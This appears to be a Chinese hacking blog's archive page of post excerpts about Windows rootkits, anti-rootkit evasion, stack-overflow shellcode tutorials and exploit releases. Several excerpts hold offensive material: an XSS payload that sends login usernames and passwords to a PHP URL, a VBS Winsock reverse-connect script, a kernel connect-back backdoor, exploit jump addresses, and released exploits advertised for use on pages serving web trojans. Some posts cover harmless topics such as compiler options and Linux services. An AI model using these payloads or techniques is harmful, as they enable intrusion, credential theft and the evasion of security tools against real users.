摘要: 現(xiàn)在RK(rootkit)和ARK(anti- rootkit)的斗爭已經(jīng)進(jìn)行了很久,在印象中最早出來的ARK工具是冰刃(IceSword),從冰刃開始出來到現(xiàn)在RK和ARK的斗爭一直在繼續(xù),目前冰刃還是在流行當(dāng)中,自己感覺也正是冰刃的出來才帶動(dòng)了當(dāng)前流行的RK和ARK的斗爭呵呵,現(xiàn)在很多病毒木馬已經(jīng)廣泛的帶有驅(qū)動(dòng),使用一些RK的技術(shù)和方法使自己更底層些更強(qiáng)大些,當(dāng)前流行的ARK工具主要包括:隱藏進(jìn)程檢測,內(nèi)核驅(qū)動(dòng)檢測,SSDT檢測,代碼HOOK檢測,注冊表隱藏的檢測,隱藏文件的檢測等一些功能的,下面談?wù)勛约簩?duì)一些功能的簡單愚見 嘻嘻。
..........
閱讀全文
摘要: 方法一: 替換win32k.sys
在2k3的系統(tǒng)下ZwSetSystemInformation禁止了用戶模式下加載驅(qū)動(dòng),只允許SMSS.exe加載win32k.sys。于是我們可以利用一下這個(gè)特點(diǎn):
1. 注入SMSS.EXE
2. 打開SeLoadDriverPrivilege權(quán)限
3. 把原始的win32k.sys改名
4. 復(fù)制我們的驅(qū)動(dòng)到\systemroot\system32下
5. 在SMSS.EXE中加載\\SystemRoot\\System32\\win32k.sys
6. 把\\SystemRoot\\System32\\win32k.sys改名
7. 把原始的win32k.sys文件改名改回去
..............
閱讀全文
摘要: 一、蠕蟲病毒具有自我復(fù)制能力
我們以普通的VB腳本為例來看看:
JavaScript代碼
1. Set objFs=CreateObject ("Scripting.FileSystemObject")
2. '創(chuàng)建一個(gè)文件系統(tǒng)對(duì)象
3. objFs.CreateTextFile ("C:\virus.txt", 1)
4. '通過文件系統(tǒng)對(duì)象的方法創(chuàng)建了一個(gè)TXT文件。
.....................
閱讀全文
摘要: 跟貼中看到已經(jīng)有不少朋友成功的完成了前面的所有例題,今天我們在前面的基礎(chǔ)上,繼續(xù)深入。每一講我都會(huì)引入一些新的知識(shí)和技術(shù),但只有一點(diǎn)點(diǎn),因?yàn)槲蚁M谀x完貼之后就能立刻消化吸收,這是標(biāo)準(zhǔn)的循序漸進(jìn)的案例式學(xué)習(xí)方法
另外在今天開始之前,我順便說一下后面的教學(xué)計(jì)劃:
我會(huì)再用3~4次的講座來闡述shellcode技術(shù),確保大家能夠在比較簡單的漏洞場景下實(shí)現(xiàn)通用、穩(wěn)定的溢出利用程序(exploit)
..........
閱讀全文
摘要: 麻雀雖小,五臟俱全
如果您順利的學(xué)完了前面4講的內(nèi)容,并成功的完成了第2講和第4講中的實(shí)驗(yàn),那么今天請跟我來一起挑戰(zhàn)一下劫持有漏洞的進(jìn)程,并向其植入惡意代碼的實(shí)驗(yàn),相信您成功完成這個(gè)實(shí)驗(yàn)后,學(xué)習(xí)的興趣和自信心都會(huì)暴增。
開始之前,先簡要的回答一下前幾講跟貼中提出的問題
代碼編譯少頭文件問題:可能是個(gè)人習(xí)慣問題,哪怕幾行長的程序我也會(huì)丟到project里去build,而不是用cl,所以沒有注意細(xì)節(jié)。如果你們嫌麻煩,不如和我一樣用project來build,應(yīng)該沒有問題的。否則的話,實(shí)驗(yàn)用的程序?qū)嵲谔唵瘟耍@么一點(diǎn)小問題自己決絕吧。另外,看到幾個(gè)同學(xué)說為了實(shí)驗(yàn),專門恢復(fù)了古老的VC6.0,我也感動(dòng)不已啊,呵呵。
...............
閱讀全文
摘要: 上節(jié)課沒有操練滴東西,不少蠢蠢欲動(dòng)的同學(xué)肯定已經(jīng)坐不住了。悟空,不要猴急,下面的兩堂課都是實(shí)踐課,用來在實(shí)踐中深入體會(huì)上節(jié)課中的知識(shí),并且很有趣味性哦
信息安全技術(shù)是一個(gè)對(duì)技術(shù)性要求極高的領(lǐng)域,除了扎實(shí)的計(jì)算機(jī)理論基礎(chǔ)外、更重要的是優(yōu)秀的動(dòng)手實(shí)踐能力。在我看來,不懂二進(jìn)制就無從談起安全技術(shù)。
緩沖區(qū)溢出的概念我若干年前已經(jīng)了然于胸,不就是淹個(gè)返回地址把CPU指到緩沖區(qū)的shellcode去么。然而當(dāng)我開始動(dòng)手實(shí)踐的時(shí)候,才發(fā)現(xiàn)實(shí)際中的情況遠(yuǎn)遠(yuǎn)比原理復(fù)雜。
................
閱讀全文
摘要: 掃盲班第三講開課啦!
上節(jié)課我們用越過數(shù)組邊界的一個(gè)字節(jié)把鄰接的標(biāo)志變量修改成0,從而突破了密碼驗(yàn)證程序。您實(shí)驗(yàn)成功了嗎?沒有的話回去做完實(shí)驗(yàn)在來聽今天的課!
有幾個(gè)同學(xué)反映編譯器的問題,我還是建議用VC6.0,因?yàn)樗黚uild出來的PE最適合初學(xué)者領(lǐng)會(huì)概念。而且這門課動(dòng)手很重要,基本上我的實(shí)驗(yàn)指導(dǎo)都是按VC6.0來寫的,用別的build出來要是有點(diǎn)出入,實(shí)驗(yàn)不成功的話會(huì)損失學(xué)習(xí)積極性滴——實(shí)驗(yàn)獲得的成就感是學(xué)習(xí)最好的動(dòng)力。
............
閱讀全文
摘要: 本想來點(diǎn)大道理申明下研究思路啥的,看到大家的熱情期待,稍微調(diào)整一下講課的順序。從今天開始,將用3~4次給大家做一下棧溢出的掃盲。
棧溢出的文章網(wǎng)上還是有不少的(其實(shí)優(yōu)秀的也就兩三篇),原理也不難,讀過基本上就能夠明白是怎么回事。本次講解將主要集中在動(dòng)手調(diào)試方面,更加著重實(shí)踐。
經(jīng)過這3~4次的棧溢出掃盲,我們的目標(biāo)是:
領(lǐng)會(huì)棧溢出攻擊的基本原理
能夠動(dòng)手調(diào)試簡易的棧溢出漏洞程序,并能夠利用漏洞執(zhí)行任意代碼(最簡易的shellcode)
.............
閱讀全文
摘要: 您是否夢想過能夠像電影上演的那樣黑進(jìn)任意一臺(tái)機(jī)器遠(yuǎn)程操控?您的夢想是否曾經(jīng)被書店里邊滿架子的反黑,防毒,擒木馬的掃盲書強(qiáng)暴的體無完膚?
從今天開始,準(zhǔn)備陸續(xù)發(fā)一系列關(guān)于軟件漏洞方面基礎(chǔ)知識(shí)的帖子,包括軟件漏洞的研究價(jià)值,研究方法,堆棧利用的基礎(chǔ)知識(shí),shellcode的調(diào)試方法,漏洞調(diào)試方法,漏洞分析,漏洞挖掘,軟件安全性測試等等,此外還將介紹一些metasploit架構(gòu)和fuzz測試方面的入門知識(shí)。
軟件漏洞分析,利用,發(fā)掘是當(dāng)今安全技術(shù)界中流砥柱級(jí)別話題,如果您關(guān)注過black hat或者defcon之類的頂級(jí)安全技術(shù)峰會(huì)的話,就知道我不是在吹牛了。可惜的是這方面的中文資料很少,偶爾有一篇比較優(yōu)秀的文章但又不夠系統(tǒng),目前為止也沒有形成像破解技術(shù)這樣的討論風(fēng)氣,菜鳥們在黑燈瞎火的夜晚瞎折騰,沒有交流和指導(dǎo),興趣就像被拔了氣彌兒芯的車胎,很快就泄氣了。
雖然漏洞分析與利用與破解在技術(shù)上各有側(cè)重點(diǎn),但逆向基礎(chǔ)是共同的。以我個(gè)人的經(jīng)驗(yàn),能做crack的朋友只要稍加進(jìn)修就能入門。就算沒有任何匯編基礎(chǔ)和逆向經(jīng)驗(yàn)的朋友也不用擔(dān)心,因?yàn)檫@ 閱讀全文
摘要: 通過hook ssdt中的ZwQuerySystemInformation來實(shí)現(xiàn)隱藏進(jìn)程已經(jīng)是很老的技術(shù)了。
qiweixue 在他的文章里面寫的很清楚了:
http://bbs.pediy.com/showthread.php?t=36742&highlight=%E9%9A%90%E8%97%8F+%E8%97%8F%E8%BF%9B+%E8%BF%9B%E7%A8%8B
不過他的文章里面,進(jìn)程名字是直接寫死的,不能通過三層進(jìn)行傳遞,而且得到ZwQuerySystemInformation是通過匯編的方法,這樣在其他系統(tǒng)上可能會(huì)有問題,所以我做了一些改善如下:
1 通過應(yīng)用程序?qū)⑦M(jìn)程名字傳遞進(jìn)來,可以傳遞多個(gè)進(jìn)程名字,格式為:qq.exe;taskmgr.exe;
2 通用的方法來得到ZwQuerySystemInformation的地址,不過這個(gè)方法都是從rookit上得來的。
...........
閱讀全文
摘要: 偶然發(fā)現(xiàn)OllyDBG.exe導(dǎo)出了一堆函數(shù),這些函數(shù)都是供其插件調(diào)用的。對(duì)這種體系結(jié)構(gòu)很感
興趣,想弄清楚它的實(shí)現(xiàn)原理。后來又看到梁肇新的書《編程高手箴言》第278頁提到的調(diào)用
門,覺得都應(yīng)該差不多。
三種不同的解決辦法(原理可能是一樣的,:)):
1)在導(dǎo)出函數(shù)聲明之前加上__declspec(dllexport)。例:
__declspec(dllexport) int Add(int a, int b);
__declspec(dllexport) int Sub(int a, int b);
__declspec(dllexport) int Mul(int a, int b);
__declspec(dllexport) int Div(int a, int b);
..........
閱讀全文
摘要: icesword.exe 在執(zhí)行的時(shí)候會(huì)放出一個(gè)驅(qū)動(dòng)程序 ispubdrv.sys .
icesword.exe 裝載 這個(gè)驅(qū)動(dòng),這個(gè)驅(qū)動(dòng)安裝后就不會(huì)卸載。直到系統(tǒng)重新啟動(dòng)。這可能是因?yàn)轵?qū)動(dòng)中調(diào)用了
PsSetCreateThreadNotifyRoutine 函數(shù).下面是這個(gè)函數(shù)在 ddk 中的介紹。
........
閱讀全文
摘要: 一、為什么需要偽造內(nèi)核:
IceSword(以下簡稱IS)為了防止一些關(guān)鍵系統(tǒng)函數(shù)(包括所有服務(wù)中斷表中的函數(shù)以及IS驅(qū)動(dòng)部分要使用到的一些關(guān)鍵函數(shù))被 patch,它直接讀取內(nèi)核文件(以下簡稱“ntoskrnl.exe”),然后自己分析ntoskrnl.exe 的PE結(jié)構(gòu)來獲取關(guān)鍵系統(tǒng)函數(shù)的原始代碼并且把當(dāng)前內(nèi)核中所有的關(guān)鍵系統(tǒng)函數(shù)還原為windows默認(rèn)狀態(tài),這樣保證了IS使用到的函數(shù)不被patch 過。也許你會(huì)想如果我們把還原后的函數(shù)再進(jìn)行patch不還是能躲的過去嗎?筆者也試過
.....................
閱讀全文
摘要: [經(jīng)典溢出攻擊流程]
———————————
1. 查找Kernel32.dll基地址;
2. 查找GetProcAddress()函數(shù)地址;
3. 查找其它API函數(shù)地址;
4. CreateProcess();
5. 遠(yuǎn)程連接。
我們都知道WINDOWS的系統(tǒng)功能不像UNIX的系統(tǒng)調(diào)用那樣實(shí)現(xiàn),由于WINDOWS版本的不斷更新,使得系統(tǒng)調(diào)用對(duì)SHELLCODE幾乎起不到作用。
但是WINDOWS是靠DLL動(dòng)態(tài)鏈接庫來實(shí)現(xiàn),這就是說,如果能從KERNEL32.DLL中獲取LoadLibrary()和GetProcAddress()函數(shù)的地址,我們就可以調(diào)用WINDOWS下的所有函數(shù)了。
所以我們需要對(duì)KERNEL32.DLL進(jìn)行地址定位,這也是本文的目的。
................
閱讀全文
摘要:
1.起因
C++程序員對(duì)try,catch,throw都應(yīng)該很熟悉,能知道VC怎么實(shí)現(xiàn)它的人就不多了,不過網(wǎng)絡(luò)世界使很多人知道了它與SEH (structured exception handling)有密切關(guān)系,我也不例外,也是在若干年前從網(wǎng)絡(luò)知道了SEH,并且大致也知道SEH的流程.但是和多數(shù)人一樣在我的實(shí)踐也很少直接使用 SEH,對(duì)SEH也就僅限于網(wǎng)絡(luò)上一些文章的介紹.曾經(jīng)在用Windbg對(duì)某些軟件作分析,我遇到了斷點(diǎn)失效的情況,查找資料介紹是SEH中的 Handler清除了調(diào)試寄存器,在分析.....................
閱讀全文
摘要: 本文描述了一些方法,可以饒過目前主流的現(xiàn)代Anti-rootkit工具,包括但不限于:
Icesword 最新版
Gmer最新版
Rootkit unhooker 最新版
DarkSpy 最新版
AVG Anti-rootkit最新版
等等
................
閱讀全文
摘要: '搞一個(gè)特殊的站準(zhǔn)備用的,沒想到,等寫完了,洞補(bǔ)上了,郁悶
'by 009, baicker@hotmail.com
'date:071221
Dim revdata
set sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )
set sc=createobject( "WScript.Shell" )
Set fso =CreateObject( "Scripting.FileSystemObject" )
sock.connect "127.0.0.1" , 1234
................
閱讀全文
摘要:
眾所周知,bo2k可以在一個(gè)指定的進(jìn)程空間(比如explorer.exe進(jìn)程)做為一個(gè)線程運(yùn)行。本文試圖找出一種方法,使得任意exe都可以在其他進(jìn)程中以線程運(yùn)行(當(dāng)然,這里說的"任意"是有條件的,下面會(huì)講到)。
為行文簡單起見,我把先加載的exe稱為宿主,后加載的exe稱為客戶。對(duì)于上面的例子,explorer.exe為宿主,bo2k.exe為客戶。
基本知識(shí)
每一個(gè)exe都有一個(gè)缺省加載基址,一般都是0x400000。如果實(shí)際加載基址和缺省基址相同,程序中的重定位表就不需要修正(fixup),否則,就必須修正重定位表;
閱讀全文
摘要: 之前的反彈sc有問題,請重新下載測試(071218)
閱讀全文
摘要: secdrv local exp
winxp cn sp2, win2k3 cn sp1 測試通過
之前的版本只能xp下用,這個(gè)2k3也可以了,其實(shí)前段時(shí)間朋友給過我一個(gè)這個(gè)漏洞的1day,但是朋友的東西不能亂發(fā),這個(gè)是自己寫的,發(fā)出來大家惡心一下。 閱讀全文
摘要: Win2k3_CN SP1 msjet40.dll ver 4.0.9025.0 測試成功
WinXP_CN SP2 msjet40.dll ver 4.0.8618.0 測試成功
mdb_d_exp.exe 為debug版本
mdb_r_exp.exe 為relrease版本
之前的反彈sc有問題,請重新下載測試(071218)
閱讀全文
摘要: 注:Windows2000_CN SP2(我只有這臺(tái)SP2的2k測試機(jī)),WindowsXP_CN SP2測試通過
網(wǎng)上流傳的都TMD垃圾不能用,不知道抄來抄去轉(zhuǎn)來轉(zhuǎn)去哪些代碼轉(zhuǎn)錯(cuò)了
這個(gè)是我自己修改過的
閱讀全文
摘要: 小改了一下代碼,這下好用了
WinXP_CN SP2測試通過
Win2k3測試藍(lán)屏,注意保存文件哦 閱讀全文
摘要: 注:Windows2003_CN SP1 / WindowsXP_CN SP2 + RealPlay10.0 測試通過
好像10.5以下版本都中,這個(gè)似乎只能溢出一次,第一次溢出成功后,第二次開始會(huì)有realplay修復(fù)數(shù)據(jù)庫的提示,點(diǎn)修復(fù)就中,取消不中
上次測試使用的"Windows 按鈕突破專家" 4.5K 溢出沒問題,但是"iecv.exe"那個(gè)87K
溢出的時(shí)候老是看不到界面,其實(shí)已經(jīng)執(zhí)行(進(jìn)程中可以看到),不知道為什么(不知道是否大小問題)
另:IE5不中,代碼中直接跳過了
閱讀全文
摘要: 迅雷官方最新版本迅雷(Thunder5.7.4.401)依然受此漏洞影響
掛馬相當(dāng)好用,只是如果用iframe,寬高不能為0
(pplayer.dll 組件版本號(hào):1.2.3.49,CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F)
閱讀全文
摘要: 本文一共介紹了七種javascript加密方法:
在做網(wǎng)頁時(shí)(其實(shí)是網(wǎng)頁木馬呵呵),最讓人煩惱的是自己辛辛苦苦寫出來的客戶端IE運(yùn)行的javascript代碼常常被別人輕易的拷貝,實(shí)在讓自己的心里有點(diǎn)不是滋味,要知道自己寫點(diǎn)東西也挺累的......^*^
但我們也應(yīng)該清楚地認(rèn)識(shí)到因?yàn)閖avascript代碼是在IE中解釋執(zhí)行,要想絕對(duì)的保密是不可能的,我們要做的就是盡可能的增大拷貝者復(fù)制的難度,讓他知難而退(但愿~!~),下面我結(jié)合自己這幾年來的實(shí)踐,及個(gè)人研究的心得,和大家一起來探討一下網(wǎng)頁中javascript代碼的加密解密技術(shù)。
以加密下面的javascript代碼為例:
......
閱讀全文
摘要: VC- Project Setting-Debug-Project Option語法解釋
-優(yōu)化-
/O1 最小化空間 minimize space
/Op[-] 改善浮點(diǎn)數(shù)一致性 improve floating-pt consistency
/O2 最大化速度 maximize speed
/Os 優(yōu)選代碼空間 favor code space
/Oa 假設(shè)沒有別名 assume no aliasing
/Ot 優(yōu)選代碼速度 favor code speed
/Ob 內(nèi)聯(lián)展開(默認(rèn) n=0) inline expansion (default n=0)
/Ow 假設(shè)交叉函數(shù)別名 assume cross-function aliasing
/Od 禁用優(yōu)化(默認(rèn)值) disable optimizations (default)
/Ox 最大化選項(xiàng)。(/Ogityb2 /Gs) maximum opts. (/Ogityb1 /Gs)
/Og 啟用全局優(yōu)化 閱讀全文
摘要: 一、autorun.inf是windows下操縱光盤行為的一個(gè)文件,需要放在光盤根目錄下,部分操作對(duì)于硬盤也適用。
二、autorun.inf是可以被禁止的。方法如下:
點(diǎn)擊開始->運(yùn)行,在文本框中輸入regedit或者regedt32。依次展開HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer,其中的NoDriveTypeAutoRun子鍵限制著Autorun的作用范圍,默認(rèn)為95(16進(jìn)制)。
................
閱讀全文
摘要: 1.最短的動(dòng)態(tài)插入JS.
代碼:
<x/**/style=xss:expression(document.appendChild(document.createElement('script')).src='xss.js')>
2.獲取表單密碼.
代碼:
window.onload=function(){document.forms['login'].onsubmit=function(){var a=new Image();a.src="http://127.0.0.1/loveshell.php"+this.username.value+"&"+this.password.value;this.submit();}};
.......
閱讀全文
摘要: 使用OD反匯編修改NateOn,雖然很麻煩,最終還是搞定了,后來發(fā)現(xiàn)網(wǎng)上有段代碼,直接可以實(shí)現(xiàn)程序多開,測試了MSN、NateOn沒問題,代碼如下:
.386
.model flat, stdcall
option casemap :none
include windows.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib
............
閱讀全文
摘要: 不說廢話,且看怎么實(shí)現(xiàn),我先拿SOHU BLOG做示范.
1.測試過濾字符,下面都是構(gòu)造XSS所需要的關(guān)鍵字符(未包含全角字符,空格是個(gè)TABLE,\/前是真正的空格),在個(gè)人檔案處看過濾了哪些.
’’;:!--"<javascript JAvaSCriPT>={()} \/
結(jié)果
’’;:!--"={()} // (&后是amp,論壇過濾了)
.........
閱讀全文
摘要: 這是一個(gè)在內(nèi)核模塊中實(shí)現(xiàn)的反連后門,大家看看這于應(yīng)用層上的實(shí)現(xiàn)有什么不同吧,呵呵
/*
* Kernel mode connect backdoor,haha~
*
* just a demo module to teach you how to write a backdoor in kernel mode,
* i belive you can add more code to make it strong and powerful,wulala.
*
* by wzt <wzt#xsec.org>
*
*/
閱讀全文
摘要: 寫程序麻煩,還要傳上去,幸好VBS每臺(tái)服務(wù)器應(yīng)該都可以運(yùn)行的吧,很少會(huì)又禁止的
使用SendKeys搞定
例如呼出Cain使用果如下腳本:)
Set WshShell= Wscript.CreateObject("Wscript.Shell")
Wscript.Sleep 1500
WshShell.SendKeys "%{PGUP}"
以下位SendKeys的相關(guān)使用方法等
............
閱讀全文
摘要:
一些opcodes
by axis
2007-03-28
近日在寫exploit的時(shí)候需要用到一些其他語言的call ebx的跳轉(zhuǎn)地址,但是metasploit的opcode DB沒有包括繁體中文、日文、韓文機(jī)器的跳轉(zhuǎn)地址,所以費(fèi)了點(diǎn)時(shí)間收集了下,在這里要感謝傲少提供的機(jī)器給我去找地址。現(xiàn)在貼到這里,方便大家。
簡體中文windows的通用跳轉(zhuǎn)地址:(2k/XP/2k3)
0x7ffa45f3 jmp ecx \xff\xe1
0x7ffa4967 jmp ebp \xff\xe5
0x7ffa4a1b jmp ebx \xff\xe3
..................
閱讀全文
摘要: 更新:上次比較匆忙,有個(gè)函數(shù)沒改好,今天才可以上網(wǎng),現(xiàn)在沒問題了
前段時(shí)間出了個(gè)radmin的算是技巧吧(http://www.tkk7.com/baicker/archive/2007/09/12/144609.html),以前也有過這個(gè)想法,只是沒有去研究,這次索性修改了下源文件,直接改成利用hash登錄的版本,省得每次帶個(gè)od跑,針對(duì)屏幕相關(guān)的似乎不行,不過已經(jīng)夠用了呵呵
注:hash用小寫字母(懶得改了)
http://www.tkk7.com/Files/baicker/Radmin_Hash.rar
閱讀全文
摘要: Please note that this code and explanation was only released AFTER MySpace resolved this.
None of this would work on MySpace at the time it was released and it will not work now. Otherwise, there would have been mayhem.
Now, let's talk more about the problems encountered, workarounds, and how it worked in general.
1) Myspace blocks a lot of tags. In fact, they only seem to allow <a>, <img>s, and <div>s...maybe a few others (<embed>'s, I think). They would 閱讀全文
摘要: "←"為ESC代碼 ^YzFEu $
在用EDIT編輯批處理文件時(shí)可用下列方法輸入ESC字符.首先同時(shí)按下Ctrl和P鍵 \?)@ #Qs
然后再按下作方括號(hào),此時(shí)屏幕出現(xiàn)一左箭頭,說明已輸入了ESC字符.之后必須放 Jq)!)={
開Ctrl再次按下方括號(hào)鍵開始ANSI命令.
ESC[Ps;...;Psm
設(shè)置圖形模式:調(diào)用由下列數(shù)值指定的圖形函數(shù),在該序列再次出現(xiàn)之前,這些被指定的函數(shù)保持激活狀態(tài)。圖形模式改變屏幕上顯示的顏色和文本(例如:黑體和下劃線字體)屬性。
文本屬性
值功能
------------------------------------
0 無屬性
1 黑體
4 下劃線字體(僅適用于單色顯示適配器)
5 閃爍字體
..........
閱讀全文
摘要: alsasound Alsa 聲卡驅(qū)動(dòng)程序支持。Alsa聲卡驅(qū)動(dòng)程序本來是為了一種聲卡Gravis UltraSound(GUS)而寫的,它和OSS/Free 及OSS/Linux兼容。
apmd 用來監(jiān)視系統(tǒng)用電狀態(tài),并將相關(guān)信息通過syslogd 寫入日志,也可以用來在電源不足時(shí)關(guān)機(jī)。一般用于筆記本電腦,若是臺(tái)式機(jī)建議關(guān)閉。
atd 用At命令調(diào)度的任務(wù),也在系統(tǒng)負(fù)荷比較低時(shí)運(yùn)行批處理任務(wù)。
autofs 需要時(shí)自動(dòng)轉(zhuǎn)載文件系統(tǒng),不需要時(shí)自動(dòng)卸載。
chargen 端口chargen字符產(chǎn)生的縮寫,輸出一個(gè)可打印字符的旋轉(zhuǎn)序列,用于測試字符終端設(shè)備。
chargen udp udp格式下端口chargen字符產(chǎn)生的縮寫,輸出一個(gè)可打印字符的旋轉(zhuǎn)序列,用于測試字符終端設(shè)備。
crond 根據(jù)用戶要求周期地運(yùn)行調(diào)度的任務(wù)。它比較安全,配置簡單,類似Windows中的計(jì)劃任務(wù)。
dhcpd 提供了對(duì)動(dòng)態(tài)主機(jī)控制協(xié)議(Dynamic Host Control Pro 閱讀全文
摘要: cp_syn_retries :INTEGER
默認(rèn)值是5
對(duì)于一個(gè)新建連接,內(nèi)核要發(fā)送多少個(gè) SYN 連接請求才決定放棄。不應(yīng)該大于255,默認(rèn)值是5,對(duì)應(yīng)于180秒左右時(shí)間。(對(duì)于大負(fù)載而物理通信良好的網(wǎng)絡(luò)而言,這個(gè)值偏高,可修改為2.這個(gè)值僅僅是針對(duì)對(duì)外的連接,對(duì)進(jìn)來的連接,是由tcp_retries1 決定的)
tcp_synack_retries :INTEGER
默認(rèn)值是5
對(duì)于遠(yuǎn)端的連接請求SYN,內(nèi)核會(huì)發(fā)送SYN + ACK數(shù)據(jù)報(bào),以確認(rèn)收到上一個(gè) SYN連接請求包。這是所謂的三次握手( threeway handshake)機(jī)制的第二個(gè)步驟。這里決定內(nèi)核在放棄連接之前所送出的 SYN+ACK 數(shù)目。不應(yīng)該大于255,默認(rèn)值是5,對(duì)應(yīng)于180秒左右時(shí)間。(可以根據(jù)上面的 tcp_syn_retries 來決定這個(gè)值)
tcp_keepalive_time :INTEGER
默認(rèn)值是7200(2小時(shí))
當(dāng)keepalive打開的情況下,TCP發(fā)送keepalive消息的頻率。(由于目前網(wǎng)絡(luò) 閱讀全文
摘要: Radmin 是一款很不錯(cuò)的服務(wù)器管理
無論是 遠(yuǎn)程桌面控制 還是 文件傳輸
速度都很快 很方便
這樣也形成了 很多服務(wù)器都裝了 radmin這樣的
現(xiàn)在你說 4899默認(rèn)端口 沒密碼的 服務(wù)器你上哪找?
大家都知道radmin的密碼都是32位md5加密后
存放在注冊表里的
具體的表鍵值為 HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\
那在攻陷一臺(tái)web服務(wù)器時(shí) 大家 怎么能進(jìn)一步提權(quán)?
如果你說 暴力破解 radmin 密碼 呵呵 那也行
只不過 你要有足夠的時(shí)間 跟精力
我想很少人 花上幾星期 幾月 甚至幾年 去破解那個(gè)密碼
............
閱讀全文
摘要:
1、接電話時(shí)對(duì)著話筒說:你好,主人不在家,這里是電話錄音,當(dāng)你聽到biu~~的一聲時(shí),請留言。biu~~(打入者楞住了)biu~~biu~~(……)biu~~靠!我都biu~~了怎么還不留啊!
2、接電話時(shí)說:對(duì)不起,您撥打的電話已關(guān)機(jī)或已離開服務(wù)區(qū)。
3、索性一接電話就發(fā)出嘟嘟嘟的聲音。
4、接電話時(shí)對(duì)著話筒發(fā)出貞子般的呼氣聲。
5、接女生電話時(shí)說:王老五!拜托!裝個(gè)娘娘腔我就聽不出了嗎?不要再騷擾我了,我正泡妞呢,再打過來小心我報(bào)警,告你打色情電話!
.............
閱讀全文
摘要: 很多時(shí)候程序的 Debug 版本運(yùn)行沒有任何問題,但是一旦發(fā)布 Release 版本后,運(yùn)行就出錯(cuò),著實(shí)讓人郁悶。大家知道,VC++ 中 Release 版本是對(duì)無法對(duì)源代碼進(jìn)行調(diào)試的。一般的做法是在懷疑有錯(cuò)誤的代碼前后插入MessageBox 函數(shù),在函數(shù)中顯示可能導(dǎo)致錯(cuò)誤的變量的值。或者插入寫文件的語句,輸出可能導(dǎo)致錯(cuò)誤的變量的值到一個(gè)記錄文件。其實(shí),除了上面講的這個(gè)辦法之外,還有其它的途徑來調(diào)試 Release 版本的。下面就結(jié)合自己的經(jīng)驗(yàn)和網(wǎng)上查找的一些資料給出調(diào)試 Release 版本的兩個(gè)方法:
......
閱讀全文
摘要: 基本概念
鉤子(Hook),是Windows消息處理機(jī)制的一個(gè)平臺(tái),應(yīng)用程序可以在上面設(shè)置子程以監(jiān)視指定窗口的某種消息,而且所監(jiān)視的窗口可以是其他進(jìn)程所創(chuàng)建的。當(dāng)消息到達(dá)后,在目標(biāo)窗口處理函數(shù)之前處理它。鉤子機(jī)制允許應(yīng)用程序截獲處理window消息或特定事件。
鉤子實(shí)際上是一個(gè)處理消息的程序段,通過系統(tǒng)調(diào)用,把它掛入系統(tǒng)。每當(dāng)特定的消息發(fā)出,在沒有到達(dá)目的窗口前,鉤子程序就先捕獲該消息,亦即鉤子函數(shù)先得到控制權(quán)。這時(shí)鉤子函數(shù)即可以加工處理(改變)該消息,也可以不作處理而繼續(xù)傳遞該消息,還可以強(qiáng)制結(jié)束消息的傳遞。
運(yùn)行機(jī)制
1、鉤子鏈表和鉤子子程:
.......
閱讀全文
摘要: 運(yùn)行pl程序,提示:Can't locate DBI.pm in @INC,解決方法如下:
Install cygwin with these options:
- gcc (devel)
- make (devel)
- binutils (devel)
- Perl 5.8.6 (interpreters)
- Perl win32 API (libs)
- PostgreSQL (database)
installing DBI-1.48.tar.gz as follows:
- Unpack the kit into /usr/src (c:\cygwin\usr\src)
- Open a cygwin shell and cd to /usr/src/DBI-1.48
- perl Makefile.PL
- make
- make test
- make install
在cygwin的shell下執(zhí)行相應(yīng)pl文件,比如./ 閱讀全文
摘要: 系統(tǒng)資源的占用情況
內(nèi)存 —— 很理想。SQL占用的內(nèi)存最大也沒有超過65M,一般是在35M左右;asp.net占用的內(nèi)存最大也沒有超過40M,一般是在25M左右。
CPU:8%左右,由于訪問次數(shù)不多,也不夠集中,所以這個(gè)數(shù)值也說明不了什么。自己連續(xù)點(diǎn)了n次下一頁,發(fā)現(xiàn)CPU的使用率飄高,達(dá)到了50%左右。
但是對(duì)于100萬的記錄,AMD XP2000+ 的CPU 幾十毫秒的放映速度,因該是可以接受的,甚至是很理想的吧。
畢竟服務(wù)器的CPU要比我的快很多吧,而且記錄也很難達(dá)到100萬吧。
結(jié)果還是很滿意的,但是美中不足的是,我想看一下海量訪問的情況下的效果,
另外說明一下:前n頁可以在60毫秒內(nèi)完成,n應(yīng)該是大于500的,小于多少嘛還沒有測試。后n頁就比較慢了,需要500毫秒左右。
下面討論一下翻頁的技巧吧。
我沒有用游標(biāo)、臨時(shí)表、not in、in 這些方法,并不是說他們的效率不高,而是我還沒有測試過。我只用了 top ,查了兩次表。
大家也可提供一些其他的方法,我來測試一下,看看在100萬條的情況下的效果。
< 閱讀全文
摘要: 概述
在本例中,我們來實(shí)際編寫一個(gè)可以在使用堆棧保護(hù)的系統(tǒng)中執(zhí)行的shellcode。該shellcode通過利用ntdll.dll的部分指令跳轉(zhuǎn)到我們的代碼執(zhí)行。在大多數(shù)的dll中都可以實(shí)現(xiàn)此方法,而且可以完全饒過堆棧保護(hù)機(jī)制,因?yàn)橥ㄟ^此方法并沒有任何代碼在堆棧非執(zhí)行區(qū)域中執(zhí)行。
詳述
我們也許都聽說過堆棧保護(hù)這么一個(gè)詞。很多安全程序提供了對(duì)堆棧中的代碼執(zhí)行的保護(hù)功能(譯者注:原文這里用的是“protect”,其實(shí)我個(gè)人認(rèn)為用 “disallow”或者“disable”更確切的。因?yàn)檫@類所謂的堆棧保護(hù),其實(shí)就是禁止代碼在堆棧中執(zhí)行。)。一些新的硬件產(chǎn)品也具有禁止代碼在 “非執(zhí)行”內(nèi)存區(qū)域中執(zhí)行(比如AMD64)。然而編寫一個(gè)饒過此機(jī)制的shellcode并不是件難事,下面我給大家簡單的介紹一下。
方法就是使用dll的部分代碼來達(dá)到我們的目的。如何做到呢?首先在堆棧發(fā)生溢出的時(shí)候我們將返回地址設(shè)置成ntdll.dll中的某個(gè)指令地址,我們要利用的ntdll的部分代碼如下:
.............
閱讀全文
摘要: Editor:admin Time:2005-8-20 23:22 Read:9985 Score:8 Print
Writer:HSLY
Excerpt:80x86匯編小站
Preface:
分享逆向技術(shù)心德......
Content:
[標(biāo)題] 教你如何分析未文檔化的數(shù)據(jù)結(jié)構(gòu)
[作者] hsly110 或者 豬頭三
[個(gè)人網(wǎng)站] http://www.x86asm.com 80x86匯編小站
